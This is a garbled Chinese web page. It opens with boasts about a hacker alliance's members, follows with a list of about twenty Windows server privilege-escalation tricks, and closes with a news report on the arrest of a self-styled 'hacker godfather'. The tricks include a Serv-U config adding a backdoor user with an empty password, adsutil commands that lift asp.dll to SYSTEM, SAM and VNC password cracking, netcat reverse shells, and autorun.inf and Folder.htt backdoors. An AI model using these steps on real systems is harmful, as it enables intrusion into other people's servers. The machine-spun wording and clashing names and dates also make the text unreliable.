编码青龙（刘信麟）黑5261盟创始人

Dragons（小虎） 黑客联盟4102第14任

BoyGod：中国红客1653联心，擅长程序编写，社会工作者，数次参加热爱祖国行動。

X.hacked（刘星宇） 华中黑客联盟创始人（我国影客同盟）2011中国与美国黑客大战出名，擅长渗入、社会工作者等顶级 *** 安全技术性。

Momo（冷淡） 青芒安全论坛关键,黑体细胞工作组关键,擅长程序编写、社会工作者,潜心 *** 安全，维护保养中华民族威势。

Demons （孙克明）擅长社会工作者渗入免杀熟练各种各样程序编写技巧。 关心 *** 安全，维护保养中华民族自尊。

NetKer (小夜) 圣剑关键，擅长渗入 社会工作者 VC c# 等程序编写技巧，维护保养 *** 安全，严厉打击 *** 诈骗。

小麦（Wheat）擅长社会工作者渗入免杀熟练各种各样程序编写技巧。 潜心 *** 安全，维护保养中华民族威势。爱黑客论坛创办人

皇太子（朱瑞）白客世家创办人 火狐浏览器团核心人物 擅长渗入 程序编写 潜心 *** 安全

其他关键工作人员临时不发布

为了更好地 *** 信息安全技术性道德化， *** 信息安全地区友谊化，做公平正义的 *** 信息安全，始终为保卫国家自尊和中华民族网警技术性发展而拼搏。“在攻与防的对立统一中寻找提升！” 時刻切记并遵循《黑客守则》《成员守则》《黑客宣言》 時刻铭记：中国法律 威势绝情 時刻切记：最会保护自己的 *** 黑客才算是更好是的 *** 黑客 時刻铭记：国家 *** 高于一切 時间取决于掌握，青春年少只在这时，取得成功路面通常都只交给会珍惜青春的人 电子计算机的全部語言，那就是大家的財富 持续的科学研究自主创新 *** 科技的攻与防 持续的发展，提升与追求完美 *** 科技的真谛 始终不做一切不利于国家 *** 的事 始终为保卫国家自尊和中华民族 *** 科技发展而战

1.radmin联接法

标准就是你权限够大，另一方连服务器防火墙都没有。封裝个radmin上来，运作，开另一方端口号，随后radmin上来。自己从未取得成功过，端口号到是给另一方打开了。

2.paanywhere

C:\\Documents and Settings\\All Users\\Application Data\\Symantec\\pcAnywhere\\ 这儿下他的GIF文档，在当地安裝pcanywhere上来。

3.SAM破译

C:\\WINNT\\system32\\config\\ 下他的SAM 破译之。

4.SU登陆密码夺得

C:\\Documents and Settings\\All Users\\「刚开始」莱单\\程序流程\\引入：Serv-U，随后当地查询特性，了解途径后，看可否自动跳转。进来后，如果有权限改动ServUDaemon.ini，加个客户上来，登陆密码为空。

[USER=WekweN|1]

Password=

HomeDir=c:\\

TimeOut=600

Maintenance=System

Access1=C:\\|RWAMELCDP

Access1=d:\\|RWAMELCDP

Access1=f:\\|RWAMELCDP

SKEYValues=

这一客户具备更大权限，随后大家就可以ftp上来 quote site exec xxx 来提高权限。

5.c:\\winnt\\system32\\inetsrv\\data\\

引入：就是这个文件目录，一样是erveryone 良好控制，大家所需做的便是把提高权限的专用工具上发上去，随后实行。

6.SU外溢提权

这一在网上实例教程N多，不详尽解读了。

7.运作Csript

引入：运作"cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps"来提高权限。

用这一cscript C:\\Inetpub\\AdminScripts\\adsutil.vbs get w3svc/inprocessisapiapps ，查询有权利的dll文档：idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll，再将asp.dll添加权利一族。asp.dll是放到c:\\winnt\\system32\\inetsrv\\asp.dll (不一样的机器放的部位不一定一样)，大家如今加上cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll" 。可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查询是否加上了。

8.脚本 *** 提权

c:\\Documents and Settings\\All Users\\「刚开始」莱单\\程序流程\\起动"载入bat，vbs。

9.VNC

默认设置状况下VNC登陆密码储放在HKCU\\Software\\ORL\\WinVNC3\\Password，大家可以用vncx4破译它。vncx4应用非常简单，要是在cmd下键入：

c:\\>vncx4 -W

随后次序键入上边的每一个十六进制数据信息，没输进去一个回车键一次就可以了。

10.NC提权

给另一方再来一个NC，可是标准就是你要有充足的运作权限，随后把它反跳到自身的电脑。

11. *** 钓鱼之GUEST提权

非常简单，查询他的客户。一般来说见到账号之后，登陆密码尽可能猜。很有可能客户登陆密码一样，也可能是他 *** 号、邮箱号、手机号码。尽可能看一下。

12.IPC空联接

假如另一方真较为傻子得话，扫他的IPC，假如好运气還是弱口令。

13.更换服务项目

这一别说了吧？我觉得非常繁杂。

14.autorun .inf

autorun=xxx.exe，这一=后边自身写。再加上写保护、系统软件、掩藏特性，传入哪一个盘都能够的，不敢相信他不运作。

15.desktop.ini与Folder.htt

引入：更先，大家如今当地创建一个文件夹名称，姓名不重要。进到它，在空白点鼠标右键，挑选“自定文件夹名称”（xp好像是不好的）一直下点，默认设置就可以。进行后，你就会看到在这里文件目录下多了2个名叫Folder setting的文件架与desktop.ini的文档，（假如你看不见，先撤销“掩藏受维护的电脑操作系统文档”），随后我们在Folder setting文件目录下寻找Folder.htt文档，文本文档开启。在随意地区添加下列编码：侧门文件夹名称” type=”application/x-oleobject” height=0 width=0>，随后你将你的侧门文档放到Folder setting文件目录下，把此文件目录与desktop.ini一起上传入另一方随意一个文件目录下，就可以了。要是等管理人员访问 了此文件目录，它就实行了大家的侧门。

16.su遮盖提权

当地安裝个su，将你自己的ServUDaemon.ini文件用从他那免费下载出来的ServUDaemon.ini 遮盖掉，重起一下Serv-U，因此你上边的全部配备都和他的一模一样了。

17.SU分享端口号

43958这个是 Serv －U 的当地管理 *** 端口号，FPIPE.exe提交他，运行命令：

Fpipe –v –l 3333 –r 43958 127.0.0.1

意思是将4444端口映射到43958端口号上。 随后就可以在当地安裝一个Serv-u，在建一个 *** 服务器，IP填另一方IP，账号为LocalAdministrator 登陆密码为$ak#.1k;0@p">#1@$ak#.1k;0@p，联接之后你就可以管理 *** 他的Serv-u了。

18.SQL账号数据泄露

假如另一方开过MSSQL *** 服务器，大家就可以根据用SQL射频连接器加管理人员账号（能够 从他的数据库连接的ASP文档中见到），由于MSSQL是默认设置的SYSTEM权限。

引入：另一方沒有删掉xp_cmdshell方式：应用Sqlexec.exe，在host一栏中填写另一方IP，User与Pass中填写你所获得的登录名与登陆密码。format挑选xp_cmdshell”%s”就可以。随后点一下connect，联接之后就可以在CMD一栏中键入你要想的CMD命令了。

19.asp.dll

引入：由于asp.dll是放到c:\\winnt\\system32\\inetsrv\\asp.dll (不一样的机器放的部位不一定同样)，大家如今加上cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\\WINNT\\system32\\idq.dll" "C:\\WINNT\\system32\\inetsrv\\httpext.dll" "C:\\WINNT\\system32\\inetsrv\\httpodbc.dll" "C:\\WINNT\\system32\\inetsrv\\ssinc.dll" "C:\\WINNT\\system32\\msw3prt.dll""c:\\winnt\\system32\\inetsrv\\asp.dll"。

好啦，如今你能用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查询是否加上

了。留意，使用 *** 中的get和set，一个是查询一个是设定，也有便是你运作上边的你需要到C:\\Inetpub\\AdminScripts>这一文件目录下。

那麼假如你是一个管理人员，你的机器被别人用这招把asp提高为system权限，那麼，这时候，防的方式便是把asp.dll 取出权利一族。也就是用set这一指令，遮盖掉刚刚的这些东西 。

20.Magic Winmail

前提条件就是你要有一个webshell 引入：这儿去看吧。

21.DBO……

“马云爸爸一个亿聘用被拒绝”“中国年青黑客教父”，这一个个洪亮的头衔被放到了一名待业的青年人小伙许某的身上。他根据在网上虚似自身的身份证信息，视频录制 *** 黑客视頻，吸引住粉絲在线充值牟取暴利。昨日，北京晨报新闻记者独家 *** 从北京公安局 *** 安全护卫总队（下称网警总队）通告，在国家公安部“清网2018”专项整治中，取得成功做掉“东方联盟”黑客网站，并将在 *** 上自我吹嘘的“黑客教父”许某抓捕。现阶段，许某涉嫌不法运用 *** 信息罪被海淀分局刑拘。

“黑客教父”网上销售黑客教程手机软件

2020年十月，网警总队会与海淀分局网警单位在 *** 上巡视中发觉，有数篇网帖大肆宣扬宣扬“黑客教父”许某，网帖內容感染力、不可逆性强，在互联网技术 *** 黑客 圈影响力极大。在帖子中将郭某化作“中国黑客”的领袖，帖子中还称“马云一个亿聘请被拒”。“郭某，曾被公认为是世界上最有天赋的黑客教父之一，他16岁就创办华盟（现东方联盟），作为一个经常出现在黑客和软件会议的人物，他现在除了有属于自己的 *** 公司，还担任多家公司的高级安全顾问，创办了中国人数最多黑客安全联盟。”不仅如此，帖子中还称“郭某创造了著名的黑客集团‘东方联盟’，很快他就把这个小组织的骨干成员扩大到十多个，2007年，郭某宣布成立华盟，并已成为中国当时更大的黑客组织之一。”

　　民警发现，网帖中除鼓吹“郭某”个人外，还多次提到了其开办了黑客网站“东方联盟”。民警很快对该网站展开调查，经分析发现，“东方联盟”实为一黑客网站，该网站以收取会员费的方式大肆传播黑客工具、分享黑客技术，其中还包括郭某录制的以“一对一授课”的模式教授黑客犯罪 *** 。

　　北京警方跨省抓捕假教父落网

　　民警通过进一步核查和工作，发现网站“东方联盟”的实际经营者为在广东佛山生活的郭某（男，28岁，广东肇庆人）。他独自一人在网上发布鼓吹自己的网帖，制造“黑客教父”的假象。通过给自己造势，吸引粉丝，借机出售会员和软件获利。至于其他成员，都是郭某杜撰出来的。调查还发现，所谓马云亿元聘请、多家公司高级安全顾问、16岁创建庞大黑客组织等种种经历均属编造。

　　在案情基本清晰后，警方很快锁定嫌疑人。抓捕前，民警从北京赶到了广州，一方面做好前期的证据固定，另一方面制定抓捕方案。11月1日14时，在广东省佛山市禅城区将黑客网站“东方联盟”的经营者郭某抓获。面对民警，该人对其开设黑客网站、传播黑客工具并进行黑客教学的行为供认不讳。民警了解到，郭某在中专毕业后，没有固定工作，靠打散工为生。他通过自吹自擂，吸引粉丝，收纳会员。

　　郭某供述，他在2015年建立了该网站。用户花费899元购买终身会员或者花费750元购买一年会员资格后，郭某便将用户拉进微信和 *** 群，在群里沟通交流。此外，他在网站上也发布黑客工具类软件，一般放在网站的“视频教程”板块，只有会员能下载。目前，他的微信群内有会员近300人， *** 群内有会员400余人。

　　目前，郭某因涉嫌非法利用信息 *** 罪被海淀分局刑事拘留。